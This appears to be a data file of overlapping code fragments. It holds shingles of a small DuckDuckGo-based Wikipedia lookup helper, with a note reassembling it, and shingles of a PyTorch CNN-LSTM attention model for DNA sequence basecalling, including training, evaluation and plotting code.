"return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if",
"query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if",
"wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else",
"and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import sys print",
"import query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url",
"query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import sys print wikipedia_presence('",
"from duckduckgo import query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\"",
"wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract !=",
"query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__':",
"a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source",
"if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and",
"query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source ==",
"if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if __name__ ==",
"\"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None",
"has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia'",
"None and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import sys",
"query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if __name__",
"def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract",
"== 'Wikipedia' else None if __name__ == '__main__': import sys print wikipedia_presence(' '.join(sys.argv[1:]))",
"!= None and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import",
"article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None",
"duckduckgo import query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return"
] |
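This row shingles a one-function helper built on the `duckduckgo` package. The `print wikipedia_presence(' '.join(...))` shingle shows the original was Python 2; the sketch below keeps the logic verbatim but uses the `print()` function so it also runs on Python 3.

```python
# Reassembled from the shingles above; the original used Python 2's
# print statement, swapped for print() here.
from duckduckgo import query

def wikipedia_presence(text):
    """Find if a query has wikipedia article"""
    # Return the abstract URL only when DuckDuckGo sourced it from Wikipedia
    # (the repeated query(text) calls are kept as in the original).
    return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None

if __name__ == '__main__':
    import sys
    print(wikipedia_presence(' '.join(sys.argv[1:])))
```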
[
"validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax =",
"[seq_len, batch, output_dim] # shape of self.hidden: (a, b), where a and b",
"HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio)",
"acc_iteration = [] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set",
"np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration),",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\")",
"both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 =",
"hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size =",
"# Stop looping if we got to the last element in the batch",
"seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd,",
"param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def",
"4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__'))",
"required = True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required",
"= read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port),",
"true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches,",
"not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\"",
"-1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0,",
"not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train +=",
"if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val +=",
"train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(),",
"following conditions are met: 1. Redistributions of source code must retain the above",
"loss to check if it has decresed, # and if it has, it",
"attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim)",
"if updates % make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch",
"weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units",
"0.35 and teacher_forcing_ratio >= 0.25: # if we have reached half of the",
"cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name",
"optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,}",
"nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)),",
"import Variable import torch.nn.functional as F import torchvision import pickle import random import",
"Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs,",
"plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()),",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # ----------- # * CNN-Encoder",
"labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x",
"LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len, input_dim] def __init__(self,",
"hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\")",
"plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0)",
"input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax =",
"0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu())",
"input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias =",
"init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) >",
"plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not",
"items in the sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs,",
"w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden",
"= data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) #",
"[batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder",
"Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is not",
"print(start, end) # ingate start, end = 0, n//4 # ordering ingate, forgetgate,",
"loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\")",
"= (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels =",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train",
"{}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title))",
"loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint",
"= hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0),",
"in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return",
"0: # remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx]",
"\"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd =",
"sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) #",
"of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on",
"dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]])",
"parser.add_argument('-i', '--input', required = True, help=\"File path to the pickle input file.\") parser.add_argument('-o',",
"plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3,",
"batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim =",
"epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch",
"loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import",
"optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters')",
"\\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(),",
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON",
"import PdfPages import math import torch.optim as optim from torch.utils.data import Dataset, DataLoader",
"labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length",
"import numpy as np import os import sys import torch import torch.nn as",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR",
"end], ord=2) # cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2,",
"LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout",
"= {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc =",
"import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import",
"random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens,",
"loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train))",
"args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir =",
"parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int,",
"* hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def",
"accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy",
"editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings",
"end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate",
"sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf()",
"dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder",
"= n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER",
"b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2",
"sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:,",
"y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases,",
"cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer",
"np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD:",
"print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr,",
"open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf,",
"early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates",
"matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from torch.utils.data import Dataset,",
"hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self):",
"LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() >",
"= {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 =",
"equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number of",
"labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ###########################################",
"= 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val",
"ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD:",
"hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port)",
"out_dim) --> (batch_size, out_dim) #decide if we are going to use teacher forcing",
"fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\")",
"cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions",
"labels so that they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0,",
"print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint,",
"seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :,",
"batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap",
"type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) #",
"= fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\")",
"size = 11 start = time.time() out12 = trainNet( model12, train_ds = train_set,",
"= ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target)",
"= {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val =",
"input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden)",
"checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname))",
"end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not in",
"Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\")",
"y[not_padded_batches, :, i] # batch-i, features, seq len y = y[not_padded_batches, :, :]",
"float(iteration + 1)))) if updates % make_validation == 0: print(\"=\" * 30) print(\"batch",
"# editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates %",
"argmax of prediction #if teacher forcing, use actual next token as next input",
"{}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc=",
"input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len",
"rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder #",
"nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional:",
"epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f}",
"label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax =",
"# Sort instances by sequence length in descending order #print(\"in length\", x_lengths) sorted_len,",
"materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence",
"in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch",
"lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation",
"help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in",
"dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train",
"data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in a Variable object",
"* 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: #",
"fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\")",
"shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx,",
"val_acc = [] val_editd = [] model.eval() total_ed = 0 total_num_chars = 0",
"THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,",
"= max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f =",
"hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch,",
"cy = (forgetgate * c) + (ingate * cellgate) hy = outgate *",
"batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0:",
"input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get",
"100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update=",
"or without modification, are permitted provided that the following conditions are met: 1.",
"SOS token] for i in max_for: # Stop looping if we got to",
"unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder #",
"batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional",
"2) # input for LSTM batch_size x seq_length x input_size #### LSTM if",
"trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None,",
"for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad()",
"padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item()",
"= [] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val,",
"batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call",
"[batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape of",
"sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True)",
"= torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader =",
"def __eq__(self, other): return self.start <= other <= self.end def make_argparser(): parser =",
"\"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) *",
"valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0",
"teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### ####",
"batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): #",
"plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig =",
"layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1,",
"hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) #",
"plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label",
"f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight",
"this list of conditions and the following disclaimer. 2. Redistributions in binary form",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end =",
"dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1]",
"/ float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher",
"= hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12",
"= sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] #",
"beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[",
"name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out",
"nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1)",
"time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" *",
"25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the",
"output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not",
"= old_ed # # old_ed = ed2 # epoch_editd += ed # running_editd_train",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings",
"import pandas as pd import argparse from distutils.util import strtobool from polyleven import",
"dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else:",
"2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) #",
"train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x,",
"make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem",
"self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise our hidden state",
"if we got to the last element in the batch if i ==",
"are going to use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio",
"with or without modification, are permitted provided that the following conditions are met:",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train,",
"x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm",
"= lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must",
